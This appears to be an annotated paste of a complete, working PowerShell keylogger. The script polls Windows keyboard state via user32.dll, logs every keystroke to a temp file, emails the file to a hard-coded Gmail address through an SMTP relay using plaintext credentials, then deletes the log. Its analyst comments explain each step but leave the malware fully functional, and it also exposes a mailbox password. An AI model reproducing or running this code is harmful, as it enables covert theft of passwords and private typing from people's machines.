
Untitled

gkseldridge Nov 15th, 2019 (edited) 98 Never
  1. # Edit only this section! Analyst note: sender mailbox, its password, recipient and SMTP relay are hard-coded in plaintext here, so any copy of this script (on disk or in script-block logs) exposes them.
  2. $TimesToRun = 1  # compared against $Runner by the outer loop in Start-KeyLogger
  3. $RunTimeP = 20  # minutes added to the start time to compute $TimeEnd
  4. $From = "billyj@usa.com"  # sender address; also used as the SMTP login name in $credentials
  5. $Pass = "cheese123"  # SMTP password stored as a plaintext literal
  6. $To = "gkseldridge@gmail.com"  # recipient of the mailed log file
  7. $Subject = "Keylogger Results"
  8. $body = "Keylogger Results"
  9. $SMTPServer = "smtp.mail.com"
  10. $SMTPPort = "587"
  11. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)  # wraps $From/$Pass as the PSCredential later passed to send-mailmessage
  12. ############################
  13.  
  14.  
  15. $TimeStart = Get-Date  # timestamp taken once, at script start
  16. $TimeEnd = $timeStart.addminutes($RunTimeP)  # deadline = start time + $RunTimeP minutes; read by the capture loop
  17.  
  18. #requires -Version 2
  19. function Start-KeyLogger($Path="$env:temp\keylogger.txt")
  20. {  # Polls keyboard state through user32.dll, appends translated characters to $Path, then mails $Path as an attachment and deletes it. $Path defaults to keylogger.txt under $env:temp.
  21.   # P/Invoke signatures for four user32.dll keyboard functions. Analyst note: this Add-Type/DllImport text is recorded by PowerShell script-block logging (Event ID 4104) when that logging is enabled.
  22.   $signatures = @'
  23. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  24. public static extern short GetAsyncKeyState(int virtualKeyCode);
  25. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  26. public static extern int GetKeyboardState(byte[] keystate);
  27. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  28. public static extern int MapVirtualKey(uint uCode, int uMapType);
  29. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  30. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  31. '@
  32.  
  33.   # compile the signatures into type API.Win32; -PassThru returns the type so its static methods can be called via $API::
  34.   $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  35.    
  36.   # create the log file at $Path; -Force replaces an existing file of the same name
  37.   $null = New-Item -Path $Path -ItemType File -Force
  38.  
  39.   try
  40.   {
  41.  
  42.     # outer loop runs while $TimesToRun >= $Runner; inner loop runs while $TimeEnd >= $TimeNow.
  43.     # $TimesToRun and $TimeEnd are read from the enclosing script scope. Nothing in this function displays the captured text.
  44.     $Runner = 0
  45.     while ($TimesToRun  -ge $Runner) {
  46.     while ($TimeEnd -ge $TimeNow) {
  47.       Start-Sleep -Milliseconds 40
  48.      
  49.       # poll every code from 9 through 254; each value is passed to GetAsyncKeyState as a virtual-key code
  50.       for ($ascii = 9; $ascii -le 254; $ascii++) {
  51.         # get current key state
  52.         $state = $API::GetAsyncKeyState($ascii)
  53.  
  54.         # -32767 is 0x8001 as a signed 16-bit value: the bit pattern this script treats as "key pressed"
  55.         if ($state -eq -32767) {
  56.           $null = [console]::CapsLock
  57.  
  58.           # call MapVirtualKey with map type 3; the result is handed to ToUnicode as its scan-code argument
  59.           $virtualKey = $API::MapVirtualKey($ascii, 3)
  60.  
  61.           # snapshot the 256-byte keyboard state array; the return value in $checkkbstate is not inspected
  62.           $kbstate = New-Object Byte[] 256
  63.           $checkkbstate = $API::GetKeyboardState($kbstate)
  64.  
  65.           # prepare a StringBuilder to receive the translated character(s)
  66.           $mychar = New-Object -TypeName System.Text.StringBuilder
  67.  
  68.           # translate the key code plus keyboard state into text
  69.           $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
  70.  
  71.           if ($success)
  72.           {
  73.             # append the translated text to the log file, encoded as UTF-16 (Encoding.Unicode)
  74.             [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
  75.           }
  76.         }
  77.       }
  78.       $TimeNow = Get-Date
  79.     }
  80.     send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl  # Analyst note: the log file leaves the host here as an SMTP attachment over TLS to $SMTPServer on port $SMTPPort, authenticated with the hard-coded credential
  81.     Remove-Item -Path $Path -force  # log file is deleted from disk right after the send call
  82.     }
  83.   }
  84.   finally
  85.   {
  86.     # terminates the PowerShell host with exit code 1; no call that opens the file in Notepad is present
  87.     exit 1
  88.   }
  89. }
  90.  
  91. # Invokes the logger with its default $Path ($env:temp\keylogger.txt).
  92. # The collected file is not opened for display: the function mails it, deletes it, and its finally-block calls exit 1.
  93. Start-KeyLogger